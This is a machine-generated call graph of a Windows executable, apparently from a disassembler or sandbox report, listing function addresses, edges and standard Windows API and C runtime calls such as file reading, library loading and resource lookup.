98908 37d891 GetStartupInfoW 98916 37d8a6 98908->98916 98917 37d9d5 98908->98917 98909->98908 98910 37d831 _flsall @_EH4_CallFilterFunc@8 98909->98910 98910->98855 98911 37da9d 98998 37daad LeaveCriticalSection _doexit 98911->98998 98913 378a05 __calloc_crt 58 API calls 98913->98916 98914 37da22 GetStdHandle 98914->98917 98915 37da35 GetFileType 98915->98917 98916->98913 98916->98917 98918 37d8f4 98916->98918 98917->98911 98917->98914 98917->98915 98997 37a05b InitializeCriticalSectionAndSpinCount 98917->98997 98918->98917 98919 37d928 GetFileType 98918->98919 98996 37a05b InitializeCriticalSectionAndSpinCount 98918->98996 98919->98918 98923 377f33 98922->98923 98924 385164 98922->98924 98928 384d4b GetModuleFileNameW 98923->98928 98999 378a4d 58 API calls 2 library calls 98924->98999 98926 3851a0 FreeEnvironmentStringsW 98926->98923 98927 38518a _memmove 98927->98926 98929 384d7f _wparse_cmdline 98928->98929 98931 384dbf _wparse_cmdline 98929->98931 99000 378a4d 58 API calls 2 library calls 98929->99000 98931->98862 98933 384fa1 __NMSG_WRITE 98932->98933 98937 384f99 98932->98937 98934 378a05 __calloc_crt 58 API calls 98933->98934 98942 384fca __NMSG_WRITE 98934->98942 98935 385021 98936 372f85 _free 58 API calls 98935->98936 98936->98937 98937->98866 98938 378a05 __calloc_crt 58 API calls 98938->98942 98939 385046 98940 372f85 _free 58 API calls 98939->98940 98940->98937 98942->98935 98942->98937 98942->98938 98942->98939 98943 38505d 98942->98943 99001 384837 58 API calls __write_nolock 98942->99001 99002 378ff6 IsProcessorFeaturePresent 98943->99002 98945 385069 98945->98866 98947 37332b __IsNonwritableInCurrentImage 98946->98947 99025 37a701 98947->99025 98949 373349 __initterm_e 98950 372f70 __cinit 67 API calls 98949->98950 98951 373368 __cinit __IsNonwritableInCurrentImage 98949->98951 98950->98951 98951->98870 98953 365fa5 98952->98953 98963 366044 98952->98963 98954 365fdf IsThemeActive 98953->98954 99028 37359c 98954->99028 98958 36600b 99040 365f00 SystemParametersInfoW SystemParametersInfoW 98958->99040 98960 366017 99041 365240 98960->99041 98962 36601f SystemParametersInfoW 98962->98963 98963->98874 98964->98848 98965->98852 98966->98859 98970->98875 98971->98878 98972->98884 98973->98887 98974->98890 98975->98891 98977 378a0c 98976->98977 98979 378a47 98977->98979 98981 378a2a 98977->98981 98985 385426 98977->98985 98979->98895 98982 37a016 TlsSetValue 98979->98982 98981->98977 98981->98979 98993 37a362 Sleep 98981->98993 98982->98898 98983->98902 98984->98899 98986 385431 98985->98986 98990 38544c 98985->98990 98987 38543d 98986->98987 98986->98990 98994 378d58 58 API calls __getptd_noexit 98987->98994 98988 38545c HeapAlloc 98988->98990 98991 385442 98988->98991 98990->98988 98990->98991 98995 3735d1 DecodePointer 98990->98995 98991->98977 98993->98981 98994->98991 98995->98990 98996->98918 98997->98917 98998->98910 98999->98927 99000->98931 99001->98942 99003 379001 99002->99003 99008 378e89 99003->99008 99007 37901c 99007->98945 99009 378ea3 _memset __call_reportfault 99008->99009 99010 378ec3 IsDebuggerPresent 99009->99010 99016 37a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99010->99016 99013 378f87 __call_reportfault 99017 37c826 99013->99017 99014 378faa 99015 37a370 GetCurrentProcess TerminateProcess 99014->99015 99015->99007 99016->99013 99018 37c830 IsProcessorFeaturePresent 99017->99018 99019 37c82e 99017->99019 99021 385b3a 99018->99021 99019->99014 99024 385ae9 5 API calls 2 library calls 99021->99024 99023 385c1d 99023->99014 99024->99023 99026 37a704 EncodePointer 99025->99026 99026->99026 99027 37a71e 99026->99027 99027->98949 99029 379e3b __lock 58 API calls 99028->99029 99030 3735a7 DecodePointer EncodePointer 99029->99030 99093 379fa5 LeaveCriticalSection 99030->99093 99032 366004 99033 373604 99032->99033 99034 373628 99033->99034 99035 37360e 99033->99035 99034->98958 99035->99034 99094 378d58 58 API calls __getptd_noexit 99035->99094 99037 373618 99095 378fe6 9 API calls __write_nolock 99037->99095 99039 373623 99039->98958 99040->98960 99042 36524d __write_nolock 99041->99042 99043 361207 59 API calls 99042->99043 99044 365258 GetCurrentDirectoryW 99043->99044 99096 364ec8 99044->99096 99046 36527e IsDebuggerPresent 99047 36528c 99046->99047 99048 3a0b21 MessageBoxA 99046->99048 99049 3a0b39 99047->99049 99050 3652a0 99047->99050 99048->99049 99299 36314d 99049->99299 99164 3631bf 99050->99164 99053 3a0b49 99060 3a0b5f SetCurrentDirectoryW 99053->99060 99055 3652be GetFullPathNameW 99056 361821 59 API calls 99055->99056 99058 3652f9 99056->99058 99057 36535f SetCurrentDirectoryW 99059 36536c Mailbox 99057->99059 99180 35bbc6 99058->99180 99059->98962 99060->99059 99079 365358 99079->99057 99093->99032 99094->99037 99095->99039 99097 361207 59 API calls 99096->99097 99098 364ede 99097->99098 99308 365420 99098->99308 99100 364efc 99101 3619e1 59 API calls 99100->99101 99102 364f10 99101->99102 99103 361c9c 59 API calls 99102->99103 99104 364f1b 99103->99104 99322 35477a 99104->99322 99107 361a36 59 API calls 99108 364f34 99107->99108 99325 3539be 99108->99325 99110 364f44 Mailbox 99111 361a36 59 API calls 99110->99111 99112 364f68 99111->99112 99113 3539be 68 API calls 99112->99113 99114 364f77 Mailbox 99113->99114 99115 361207 59 API calls 99114->99115 99116 364f94 99115->99116 99329 3655bc 99116->99329 99120 364fae 99121 3a0a54 99120->99121 99122 364fb8 99120->99122 99124 3655bc 59 API calls 99121->99124 99123 37312d _W_store_winword 60 API calls 99122->99123 99125 364fc3 99123->99125 99126 3a0a68 99124->99126 99125->99126 99127 364fcd 99125->99127 99128 3655bc 59 API calls 99126->99128 99129 37312d _W_store_winword 60 API calls 99127->99129 99130 3a0a84 99128->99130 99131 364fd8 99129->99131 99133 3700cf 61 API calls 99130->99133 99131->99130 99132 364fe2 99131->99132 99134 37312d _W_store_winword 60 API calls 99132->99134 99135 3a0aa7 99133->99135 99136 364fed 99134->99136 99137 3655bc 59 API calls 99135->99137 99138 364ff7 99136->99138 99139 3a0ad0 99136->99139 99140 3a0ab3 99137->99140 99141 36501b 99138->99141 99145 361c9c 59 API calls 99138->99145 99142 3655bc 59 API calls 99139->99142 99144 361c9c 59 API calls 99140->99144 99149 3547be 59 API calls 99141->99149 99143 3a0aee 99142->99143 99146 361c9c 59 API calls 99143->99146 99147 3a0ac1 99144->99147 99148 36500e 99145->99148 99151 3a0afc 99146->99151 99152 3655bc 59 API calls 99147->99152 99153 3655bc 59 API calls 99148->99153 99150 36502a 99149->99150 99154 354540 59 API calls 99150->99154 99155 3655bc 59 API calls 99151->99155 99152->99139 99153->99141 99156 365038 99154->99156 99157 3a0b0b 99155->99157 99345 3543d0 99156->99345 99157->99157 99159 35477a 59 API calls 99161 365055 99159->99161 99160 3543d0 59 API calls 99160->99161 99161->99159 99161->99160 99162 3655bc 59 API calls 99161->99162 99163 36509b Mailbox 99161->99163 99162->99161 99163->99046 99165 3631cc __write_nolock 99164->99165 99166 3631e5 99165->99166 99167 3a0314 _memset 99165->99167 99168 370284 60 API calls 99166->99168 99169 3a0330 GetOpenFileNameW 99167->99169 99170 3631ee 99168->99170 99171 3a037f 99169->99171 99360 3709c5 99170->99360 99173 361821 59 API calls 99171->99173 99175 3a0394 99173->99175 99175->99175 99177 363203 99378 36278a 99177->99378 99181 35bbd3 __write_nolock 99180->99181 100185 362cb2 99181->100185 99300 3631b0 99299->99300 99301 36315b 99299->99301 99302 370fe6 Mailbox 59 API calls 99300->99302 99303 370fe6 Mailbox 59 API calls 99301->99303 99304 36316c 99301->99304 99302->99304 99303->99304 99305 36436a 59 API calls 99304->99305 99306 363184 99305->99306 99306->99053 99309 36542d __write_nolock 99308->99309 99310 361821 59 API calls 99309->99310 99316 365590 Mailbox 99309->99316 99312 36545f 99310->99312 99311 361609 59 API calls 99311->99312 99312->99311 99321 365495 Mailbox 99312->99321 99313 361609 59 API calls 99313->99321 99314 365563 99315 361a36 59 API calls 99314->99315 99314->99316 99317 365584 99315->99317 99316->99100 99319 364c94 59 API calls 99317->99319 99318 361a36 59 API calls 99318->99321 99319->99316 99320 364c94 59 API calls 99320->99321 99321->99313 99321->99314 99321->99316 99321->99318 99321->99320 99323 370fe6 Mailbox 59 API calls 99322->99323 99324 354787 99323->99324 99324->99107 99326 3539c9 99325->99326 99327 3539f0 99326->99327 99354 353ea3 68 API calls Mailbox 99326->99354 99327->99110 99330 3655c6 99329->99330 99331 3655df 99329->99331 99332 361c9c 59 API calls 99330->99332 99333 361821 59 API calls 99331->99333 99334 364fa0 99332->99334 99333->99334 99335 37312d 99334->99335 99336 3731ae 99335->99336 99337 373139 99335->99337 99357 3731c0 60 API calls 3 library calls 99336->99357 99344 37315e 99337->99344 99355 378d58 58 API calls __getptd_noexit 99337->99355 99339 3731bb 99339->99120 99341 373145 99356 378fe6 9 API calls __write_nolock 99341->99356 99343 373150 99343->99120 99344->99120 99346 38d6c9 99345->99346 99351 3543e7 99345->99351 99346->99351 99359 3540cb 59 API calls Mailbox 99346->99359 99348 3544ef 99348->99161 99349 354530 99358 35523c 59 API calls 99349->99358 99350 3544e8 99353 370fe6 Mailbox 59 API calls 99350->99353 99351->99348 99351->99349 99351->99350 99353->99348 99354->99327 99355->99341 99356->99343 99357->99339 99358->99348 99359->99351 99361 381b70 __write_nolock 99360->99361 99362 3709d2 GetLongPathNameW 99361->99362 99363 361821 59 API calls 99362->99363 99364 3631f7 99363->99364 99365 362f3d 99364->99365 99366 361207 59 API calls 99365->99366 99367 362f4f 99366->99367 99368 370284 60 API calls 99367->99368 99369 362f5a 99368->99369 99370 362f65 99369->99370 99371 3a0177 99369->99371 99372 364c94 59 API calls 99370->99372 99376 3a0191 99371->99376 99418 36151f 61 API calls 99371->99418 99374 362f71 99372->99374 99412 351307 99374->99412 99377 362f84 Mailbox 99377->99177 99419 3649c2 99378->99419 99381 39f8d6 99536 3b9b16 122 API calls 2 library calls 99381->99536 99383 3649c2 136 API calls 99385 3627c3 99383->99385 99384 39f8e7 99386 39f908 99384->99386 99387 39f8eb 99384->99387 99385->99381 99388 3627cb 99385->99388 99390 370fe6 Mailbox 59 API calls 99386->99390 99537 364a2f 99387->99537 99391 3627d7 99388->99391 99392 39f8f3 99388->99392 99397 39f94d Mailbox 99390->99397 99443 3629be 99391->99443 99543 3b47e8 90 API calls _wprintf 99392->99543 99396 39f901 99396->99386 99398 39fb01 99397->99398 99402 39fb12 99397->99402 99403 36343f 59 API calls 99397->99403 99409 361a36 59 API calls 99397->99409 99544 3afef8 59 API calls 2 library calls 99397->99544 99545 3afe19 61 API calls 2 library calls 99397->99545 99546 3b793a 59 API calls Mailbox 99397->99546 99547 363297 99397->99547 99399 372f85 _free 58 API calls 99398->99399 99400 39fb09 99399->99400 99401 364a2f 84 API calls 99400->99401 99401->99402 99406 372f85 _free 58 API calls 99402->99406 99407 364a2f 84 API calls 99402->99407 99553 3aff5c 89 API calls 4 library calls 99402->99553 99403->99397 99406->99402 99407->99402 99409->99397 99413 351319 99412->99413 99417 351338 _memmove 99412->99417 99415 370fe6 Mailbox 59 API calls 99413->99415 99414 370fe6 Mailbox 59 API calls 99416 35134f 99414->99416 99415->99417 99416->99377 99417->99414 99418->99371 99554 364b29 99419->99554 99424 3a08bb 99427 364a2f 84 API calls 99424->99427 99425 3649ed LoadLibraryExW 99564 364ade 99425->99564 99429 3a08c2 99427->99429 99431 364ade 3 API calls 99429->99431 99433 3a08ca 99431->99433 99432 364a14 99432->99433 99434 364a20 99432->99434 99590 364ab2 99433->99590 99436 364a2f 84 API calls 99434->99436 99438 3627af 99436->99438 99438->99381 99438->99383 99440 3a08f1 99596 364a6e 99440->99596 99442 3a08fe 99444 3629e7 99443->99444 99445 39fd14 99443->99445 99447 363df7 60 API calls 99444->99447 100007 3aff5c 89 API calls 4 library calls 99445->100007 99449 362a09 99447->99449 99448 39fd27 100008 3aff5c 89 API calls 4 library calls 99448->100008 99450 363e47 67 API calls 99449->99450 99451 362a1e 99450->99451 99451->99448 99453 362a26 99451->99453 99454 361207 59 API calls 99453->99454 99456 362a32 99454->99456 99455 39fd43 99487 362a93 99455->99487 100005 370b8b 60 API calls __write_nolock 99456->100005 99458 362a3e 99461 361207 59 API calls 99458->99461 99459 362aa1 99463 361207 59 API calls 99459->99463 99460 39fd56 99462 3642cf CloseHandle 99460->99462 99464 362a4a 99461->99464 99465 39fd62 99462->99465 99466 362aaa 99463->99466 99467 370284 60 API calls 99464->99467 99468 3649c2 136 API calls 99465->99468 99469 361207 59 API calls 99466->99469 99471 362a58 99467->99471 99472 39fd7e 99468->99472 99470 362ab3 99469->99470 99473 370119 59 API calls 99470->99473 99474 363ea1 2 API calls 99471->99474 99475 39fda3 99472->99475 100009 3b9b16 122 API calls 2 library calls 99472->100009 99476 362aca 99473->99476 99478 362a84 99474->99478 100010 3aff5c 89 API calls 4 library calls 99475->100010 99481 3617e0 59 API calls 99476->99481 99483 36410a 2 API calls 99478->99483 99480 39fd96 99484 39fdbf 99480->99484 99485 39fd9e 99480->99485 99486 362adb SetCurrentDirectoryW 99481->99486 99482 39fdba 99514 362c3e Mailbox 99482->99514 99483->99487 99489 364a2f 84 API calls 99484->99489 99488 364a2f 84 API calls 99485->99488 99492 362aee Mailbox 99486->99492 99487->99459 99487->99460 99488->99475 99490 39fdc4 99489->99490 99491 370fe6 Mailbox 59 API calls 99490->99491 99498 39fdf8 99491->99498 99494 370fe6 Mailbox 59 API calls 99492->99494 99496 362b01 99494->99496 99495 3627ef 99495->99055 99495->99079 99497 36433f 59 API calls 99496->99497 99525 362b0c Mailbox __NMSG_WRITE 99497->99525 99499 36343f 59 API calls 99498->99499 99533 39fe41 Mailbox 99499->99533 99500 362c19 99502 3642cf CloseHandle 99500->99502 99501 3a0032 100014 3b789a 59 API calls Mailbox 99501->100014 99504 362c25 SetCurrentDirectoryW 99502->99504 99504->99514 99507 3a0054 100015 3bfc0d 59 API calls 2 library calls 99507->100015 99510 3a0061 99512 372f85 _free 58 API calls 99510->99512 99511 3a00cb 100018 3aff5c 89 API calls 4 library calls 99511->100018 99512->99514 100000 363e25 99514->100000 99516 36343f 59 API calls 99516->99533 99517 3a00e4 99517->99500 99519 3a00c3 100017 3afdb2 59 API calls 4 library calls 99519->100017 99520 361a36 59 API calls 99520->99525 99522 36314d 59 API calls 99522->99533 99525->99500 99525->99511 99525->99519 99525->99520 99529 36314d 59 API calls 99525->99529 99924 363ebe 99525->99924 99931 362e8f 99525->99931 99935 362dfe 99525->99935 99939 362edc 99525->99939 99943 3627fc 99525->99943 100006 37386d GetStringTypeW _iswctype 99525->100006 99526 361a36 59 API calls 99526->99533 99529->99525 99530 3a0084 100016 3aff5c 89 API calls 4 library calls 99530->100016 99532 3a009d 99534 372f85 _free 58 API calls 99532->99534 99533->99501 99533->99516 99533->99522 99533->99526 99533->99530 100011 3afef8 59 API calls 2 library calls 99533->100011 100012 3afe19 61 API calls 2 library calls 99533->100012 100013 3b793a 59 API calls Mailbox 99533->100013 99535 3a00b0 99534->99535 99535->99514 99536->99384 99538 364a40 99537->99538 99539 364a39 99537->99539 99541 364a60 FreeLibrary 99538->99541 99542 364a4f 99538->99542 100072 3755c6 99539->100072 99541->99542 99542->99392 99543->99396 99544->99397 99545->99397 99546->99397 99548 3632aa 99547->99548 99550 363358 99547->99550 99549 370fe6 Mailbox 59 API calls 99548->99549 99552 3632dc 99548->99552 99549->99552 99550->99397 99551 370fe6 59 API calls Mailbox 99551->99552 99552->99550 99552->99551 99553->99402 99601 364b77 99554->99601 99557 364b77 2 API calls 99560 364b50 99557->99560 99558 364b60 FreeLibrary 99559 3649d4 99558->99559 99561 37547b 99559->99561 99560->99558 99560->99559 99605 375490 99561->99605 99563 3649e1 99563->99424 99563->99425 99686 364baa 99564->99686 99567 364b03 99569 364b15 FreeLibrary 99567->99569 99570 364a05 99567->99570 99568 364baa 2 API calls 99568->99567 99569->99570 99571 3648b0 99570->99571 99572 370fe6 Mailbox 59 API calls 99571->99572 99573 3648c5 99572->99573 99574 36433f 59 API calls 99573->99574 99575 3648d1 _memmove 99574->99575 99576 3a080a 99575->99576 99577 36490c 99575->99577 99579 3a0817 99576->99579 99695 3b9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99576->99695 99578 364a6e 69 API calls 99577->99578 99582 364915 99578->99582 99696 3b9f5e 95 API calls 99579->99696 99583 3a0859 99582->99583 99584 364ab2 74 API calls 99582->99584 99589 3649a0 99582->99589 99690 364a8c 99582->99690 99585 364a8c 85 API calls 99583->99585 99584->99582 99586 3a0890 99585->99586 99588 364ab2 74 API calls 99586->99588 99588->99589 99589->99432 99591 364ac4 99590->99591 99594 3a0945 99590->99594 99802 375802 99591->99802 99595 3b96c4 GetSystemTimeAsFileTime 99595->99440 99597 3a0908 99596->99597 99598 364a7d 99596->99598 99908 375e80 99598->99908 99600 364a85 99600->99442 99602 364b44 99601->99602 99603 364b80 LoadLibraryA 99601->99603 99602->99557 99602->99560 99603->99602 99604 364b91 GetProcAddress 99603->99604 99604->99602 99606 37549c _flsall 99605->99606 99607 3754af 99606->99607 99610 3754e0 99606->99610 99654 378d58 58 API calls __getptd_noexit 99607->99654 99609 3754b4 99655 378fe6 9 API calls __write_nolock 99609->99655 99624 380718 99610->99624 99613 3754e5 99614 3754ee 99613->99614 99615 3754fb 99613->99615 99656 378d58 58 API calls __getptd_noexit 99614->99656 99616 375525 99615->99616 99617 375505 99615->99617 99639 380837 99616->99639 99657 378d58 58 API calls __getptd_noexit 99617->99657 99621 3754bf _flsall @_EH4_CallFilterFunc@8 99621->99563 99625 380724 _flsall 99624->99625 99626 379e3b __lock 58 API calls 99625->99626 99637 380732 99626->99637 99627 3807a6 99659 38082e 99627->99659 99628 3807ad 99664 378a4d 58 API calls 2 library calls 99628->99664 99631 3807b4 99631->99627 99665 37a05b InitializeCriticalSectionAndSpinCount 99631->99665 99632 380823 _flsall 99632->99613 99634 379ec3 __mtinitlocknum 58 API calls 99634->99637 99636 3807da EnterCriticalSection 99636->99627 99637->99627 99637->99628 99637->99634 99662 376e7d 59 API calls __lock 99637->99662 99663 376ee7 LeaveCriticalSection LeaveCriticalSection _doexit 99637->99663 99640 380857 __wopenfile 99639->99640 99641 380871 99640->99641 99653 380a2c 99640->99653 99672 3739fb 60 API calls 2 library calls 99640->99672 99670 378d58 58 API calls __getptd_noexit 99641->99670 99643 380876 99671 378fe6 9 API calls __write_nolock 99643->99671 99645 380a8f 99667 3887d1 99645->99667 99647 375530 99658 375552 LeaveCriticalSection LeaveCriticalSection __wfsopen 99647->99658 99649 380a25 99649->99653 99673 3739fb 60 API calls 2 library calls 99649->99673 99651 380a44 99651->99653 99674 3739fb 60 API calls 2 library calls 99651->99674 99653->99641 99653->99645 99654->99609 99655->99621 99656->99621 99657->99621 99658->99621 99666 379fa5 LeaveCriticalSection 99659->99666 99661 380835 99661->99632 99662->99637 99663->99637 99664->99631 99665->99636 99666->99661 99675 387fb5 99667->99675 99669 3887ea 99669->99647 99670->99643 99671->99647 99672->99649 99673->99651 99674->99653 99678 387fc1 _flsall 99675->99678 99676 387fd7 99677 378d58 __write_nolock 58 API calls 99676->99677 99679 387fdc 99677->99679 99678->99676 99680 38800d 99678->99680 99681 378fe6 __write_nolock 9 API calls 99679->99681 99682 38807e __wsopen_nolock 109 API calls 99680->99682 99685 387fe6 _flsall 99681->99685 99683 388029 99682->99683 99684 388052 __wsopen_helper LeaveCriticalSection 99683->99684 99684->99685 99685->99669 99687 364af7 99686->99687 99688 364bb3 LoadLibraryA 99686->99688 99687->99567 99687->99568 99688->99687 99689 364bc4 GetProcAddress 99688->99689 99689->99687 99691 3a0923 99690->99691 99692 364a9b 99690->99692 99697 375a6d 99692->99697 99694 364aa9 99694->99582 99695->99579 99696->99582 99698 375a79 _flsall 99697->99698 99699 375a8b 99698->99699 99701 375ab1 99698->99701 99728 378d58 58 API calls __getptd_noexit 99699->99728 99710 376e3e 99701->99710 99703 375a90 99729 378fe6 9 API calls __write_nolock 99703->99729 99709 375a9b _flsall 99709->99694 99711 376e70 EnterCriticalSection 99710->99711 99712 376e4e 99710->99712 99713 375ab7 99711->99713 99712->99711 99714 376e56 99712->99714 99716 3759de 99713->99716 99715 379e3b __lock 58 API calls 99714->99715 99715->99713 99717 3759fc 99716->99717 99718 3759ec 99716->99718 99719 375a12 99717->99719 99731 375af0 99717->99731 99801 378d58 58 API calls __getptd_noexit 99718->99801 99760 374c5d 99719->99760 99725 375a53 99773 38185f 99725->99773 99727 3759f1 99730 375ae8 LeaveCriticalSection LeaveCriticalSection __wfsopen 99727->99730 99728->99703 99729->99709 99730->99709 99732 375afd __write_nolock 99731->99732 99733 375b15 99732->99733 99734 375b2d 99732->99734 99735 378d58 __write_nolock 58 API calls 99733->99735 99736 374906 __filbuf 58 API calls 99734->99736 99737 375b1a 99735->99737 99738 375b35 99736->99738 99739 378fe6 __write_nolock 9 API calls 99737->99739 99740 38185f __write 64 API calls 99738->99740 99743 375b25 99739->99743 99741 375b51 99740->99741 99741->99743 99745 375bd4 99741->99745 99746 375d41 99741->99746 99742 37c826 __write_nolock 6 API calls 99744 375e7c 99742->99744 99743->99742 99744->99719 99748 375bfa 99745->99748 99752 375cfd 99745->99752 99747 375d4a 99746->99747 99746->99752 99749 378d58 __write_nolock 58 API calls 99747->99749 99748->99743 99750 3819f5 __lseeki64 62 API calls 99748->99750 99749->99743 99751 375c33 99750->99751 99751->99743 99754 375c5f ReadFile 99751->99754 99752->99743 99753 38185f __write 64 API calls 99752->99753 99755 375dae 99753->99755 99754->99743 99756 375c84 99754->99756 99755->99743 99757 38185f __write 64 API calls 99755->99757 99758 38185f __write 64 API calls 99756->99758 99757->99743 99759 375c97 99758->99759 99759->99743 99761 374c70 99760->99761 99765 374c94 99760->99765 99762 374906 __filbuf 58 API calls 99761->99762 99761->99765 99763 374c8d 99762->99763 99764 37dab6 __write 78 API calls 99763->99764 99764->99765 99766 374906 99765->99766 99767 374925 99766->99767 99768 374910 99766->99768 99767->99725 99769 378d58 __write_nolock 58 API calls 99768->99769 99770 374915 99769->99770 99771 378fe6 __write_nolock 9 API calls 99770->99771 99772 374920 99771->99772 99772->99725 99774 38186b _flsall 99773->99774 99775 381878 99774->99775 99776 38188f 99774->99776 99778 378d24 __write_nolock 58 API calls 99775->99778 99777 38192e 99776->99777 99779 3818a3 99776->99779 99780 378d24 __write_nolock 58 API calls 99777->99780 99781 38187d 99778->99781 99782 3818cb 99779->99782 99783 3818c1 99779->99783 99784 3818c6 99780->99784 99785 378d58 __write_nolock 58 API calls 99781->99785 99787 37d436 ___lock_fhandle 59 API calls 99782->99787 99786 378d24 __write_nolock 58 API calls 99783->99786 99790 378d58 __write_nolock 58 API calls 99784->99790 99788 381884 _flsall 99785->99788 99786->99784 99789 3818d1 99787->99789 99788->99727 99791 3818e4 99789->99791 99792 3818f7 99789->99792 99793 38193a 99790->99793 99794 38194e __lseek_nolock 62 API calls 99791->99794 99796 378d58 __write_nolock 58 API calls 99792->99796 99795 378fe6 __write_nolock 9 API calls 99793->99795 99797 3818f0 99794->99797 99795->99788 99798 3818fc 99796->99798 99800 381926 __write LeaveCriticalSection 99797->99800 99799 378d24 __write_nolock 58 API calls 99798->99799 99799->99797 99800->99788 99801->99727 99805 37581d 99802->99805 99804 364ad5 99804->99595 99806 375829 _flsall 99805->99806 99807 37583f _memset 99806->99807 99808 37586c 99806->99808 99809 375864 _flsall 99806->99809 99832 378d58 58 API calls __getptd_noexit 99807->99832 99810 376e3e __lock_file 59 API calls 99808->99810 99809->99804 99811 375872 99810->99811 99818 37563d 99811->99818 99814 375859 99833 378fe6 9 API calls __write_nolock 99814->99833 99819 375658 _memset 99818->99819 99831 375673 99818->99831 99820 375663 99819->99820 99826 3756b3 99819->99826 99819->99831 99903 378d58 58 API calls __getptd_noexit 99820->99903 99822 375668 99904 378fe6 9 API calls __write_nolock 99822->99904 99825 3757c4 _memset 99907 378d58 58 API calls __getptd_noexit 99825->99907 99826->99825 99827 374906 __filbuf 58 API calls 99826->99827 99826->99831 99835 38108b 99826->99835 99905 380ef8 58 API calls 3 library calls 99826->99905 99906 380dd7 72 API calls 4 library calls 99826->99906 99827->99826 99834 3758a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 99831->99834 99832->99814 99833->99809 99834->99809 99836 3810ac 99835->99836 99837 3810c3 99835->99837 99838 378d24 __write_nolock 58 API calls 99836->99838 99839 3817fb 99837->99839 99843 3810fd 99837->99843 99840 3810b1 99838->99840 99841 378d24 __write_nolock 58 API calls 99839->99841 99842 378d58 __write_nolock 58 API calls 99840->99842 99844 381800 99841->99844 99848 3810b8 99842->99848 99846 381105 99843->99846 99852 38111c 99843->99852 99845 378d58 __write_nolock 58 API calls 99844->99845 99847 381111 99845->99847 99849 378d24 __write_nolock 58 API calls 99846->99849 99851 378fe6 __write_nolock 9 API calls 99847->99851 99848->99826 99850 38110a 99849->99850 99856 378d58 __write_nolock 58 API calls 99850->99856 99851->99848 99852->99848 99853 381131 99852->99853 99855 38114b 99852->99855 99857 381169 99852->99857 99854 378d24 __write_nolock 58 API calls 99853->99854 99854->99850 99855->99853 99861 381156 99855->99861 99856->99847 99858 378a4d __malloc_crt 58 API calls 99857->99858 99859 381179 99858->99859 99862 38119c 99859->99862 99863 381181 99859->99863 99860 385e9b __write_nolock 58 API calls 99864 38126a 99860->99864 99861->99860 99867 381af1 __lseeki64_nolock 60 API calls 99862->99867 99865 378d58 __write_nolock 58 API calls 99863->99865 99866 3812e3 ReadFile 99864->99866 99871 381280 GetConsoleMode 99864->99871 99868 381186 99865->99868 99869 3817c3 GetLastError 99866->99869 99870 381305 99866->99870 99867->99861 99872 378d24 __write_nolock 58 API calls 99868->99872 99873 3817d0 99869->99873 99874 3812c3 99869->99874 99870->99869 99878 3812d5 99870->99878 99875 3812e0 99871->99875 99876 381294 99871->99876 99872->99848 99877 378d58 __write_nolock 58 API calls 99873->99877 99882 378d37 __dosmaperr 58 API calls 99874->99882 99885 3812c9 99874->99885 99875->99866 99876->99875 99879 38129a ReadConsoleW 99876->99879 99880 3817d5 99877->99880 99878->99885 99887 38133a 99878->99887 99889 3815a7 99878->99889 99879->99878 99881 3812bd GetLastError 99879->99881 99883 378d24 __write_nolock 58 API calls 99880->99883 99881->99874 99882->99885 99883->99885 99884 372f85 _free 58 API calls 99884->99848 99885->99848 99885->99884 99888 3813a6 ReadFile 99887->99888 99894 381427 99887->99894 99891 3813c7 GetLastError 99888->99891 99901 3813d1 99888->99901 99889->99885 99890 3816ad ReadFile 99889->99890 99896 3816d0 GetLastError 99890->99896 99902 3816de 99890->99902 99891->99901 99892 3814e4 99897 381494 MultiByteToWideChar 99892->99897 99898 381af1 __lseeki64_nolock 60 API calls 99892->99898 99893 3814d4 99895 378d58 __write_nolock 58 API calls 99893->99895 99894->99885 99894->99892 99894->99893 99894->99897 99895->99885 99896->99902 99897->99881 99897->99885 99898->99897 99899 381af1 __lseeki64_nolock 60 API calls 99899->99901 99900 381af1 __lseeki64_nolock 60 API calls 99900->99902 99901->99887 99901->99899 99902->99889 99902->99900 99903->99822 99904->99831 99905->99826 99906->99826 99907->99822 99909 375e8c _flsall 99908->99909 99910 375eb3 99909->99910 99911 375e9e 99909->99911 99913 376e3e __lock_file 59 API calls 99910->99913 99921 378d58 58 API calls __getptd_noexit 99911->99921 99914 375eb9 99913->99914 99916 375af0 __ftell_nolock 67 API calls 99914->99916 99915 375ea3 99922 378fe6 9 API calls __write_nolock 99915->99922 99918 375ec4 99916->99918 99923 375ee4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99918->99923 99920 375eae _flsall 99920->99600 99921->99915 99922->99920 99923->99920 99925 3619e1 59 API calls 99924->99925 99926 363ed9 99925->99926 100019 363a67 99926->100019 99928 363ee1 99932 362e9c 99931->99932 99934 362ebe 99932->99934 100053 37386d GetStringTypeW _iswctype 99932->100053 99934->99525 99936 362e0f 99935->99936 99938 362e15 99935->99938 99936->99938 100054 3739fb 60 API calls 2 library calls 99936->100054 99938->99525 99940 362ee9 __NMSG_WRITE 99939->99940 99942 362f03 99940->99942 100055 36439a GetStringTypeW 99940->100055 99942->99525 99944 370fe6 Mailbox 59 API calls 99943->99944 99945 362812 99944->99945 99946 370fe6 Mailbox 59 API calls 99945->99946 99947 36281d 99946->99947 99952 362839 Mailbox 99947->99952 100056 3739fb 60 API calls 2 library calls 99947->100056 99949 36286f 99949->99952 100057 3739fb 60 API calls 2 library calls 99949->100057 99951 362883 99951->99952 99952->99525 100001 3642cf CloseHandle 100000->100001 100002 363e2d Mailbox 100001->100002 100003 3642cf CloseHandle 100002->100003 100004 363e3c 100003->100004 100004->99495 100005->99458 100006->99525 100007->99448 100008->99455 100009->99480 100010->99482 100011->99533 100012->99533 100013->99533 100014->99507 100015->99510 100016->99532 100017->99511 100018->99517 100020 363aec 100019->100020 100021 363a79 100019->100021 100023 363b19 100020->100023 100027 363b00 100020->100027 100022 370fe6 Mailbox 59 API calls 100021->100022 100025 363a89 100022->100025 100051 3b3796 62 API calls 100023->100051 100026 370fe6 Mailbox 59 API calls 100025->100026 100028 363a97 100026->100028 100027->100021 100029 363b09 100027->100029 100050 363a22 65 API calls Mailbox 100029->100050 100034 363ab3 Mailbox 100034->99928 100050->100034 100051->100034 100053->99932 100054->99938 100055->99940 100056->99949 100057->99951 100073 3755d2 _flsall 100072->100073 100074 3755e6 100073->100074 100075 3755fe 100073->100075 100085 378d58 58 API calls __getptd_noexit 100074->100085 100078 376e3e __lock_file 59 API calls 100075->100078 100081 3755f6 _flsall 100075->100081 100077 3755eb 100086 378fe6 9 API calls __write_nolock 100077->100086 100080 375610 